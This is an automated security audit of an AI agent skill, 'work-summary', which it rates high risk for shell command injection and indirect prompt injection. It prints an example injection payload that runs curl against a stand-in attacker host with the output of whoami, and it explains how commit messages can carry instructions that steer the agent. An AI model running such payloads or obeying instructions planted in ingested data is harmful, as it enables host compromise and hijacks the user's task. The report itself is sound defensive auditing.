work-summary
Fail
Audited by Gen Agent Trust Hub on Mar 21, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION]: The skill instructions direct the agent to execute shell commands built from unvalidated user input for the repository path and author name. Specifically, the command `cd <repo> && git log --author="<author>" ...` allows an attacker to inject shell metacharacters. A malicious input such as `; curl http://attacker.com/$(whoami) #` in the repo or author field would lead to arbitrary command execution on the host system: in the unquoted repo field the `;` terminates the intended command and the `#` comments out the rest, and even inside the double-quoted author field the shell still expands `$(whoami)` before `git` ever sees the argument.
- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it processes external, untrusted commit history.
- Ingestion points: Commit messages and repository data are ingested via `git log` commands in SKILL.md.
- Boundary markers: The instructions do not specify any delimiters or safety markers to differentiate the agent's instructions from the content of the commit messages.
- Capability inventory: The agent has the ability to execute shell commands, read filesystem paths, and generate structured summaries based on the ingested content.
- Sanitization: No sanitization or escaping is performed on the commit messages before the agent is asked to group and categorize them, allowing embedded malicious instructions within a commit to potentially influence the agent's logic.
Recommendations
- AI detected serious security threats
Audit Metadata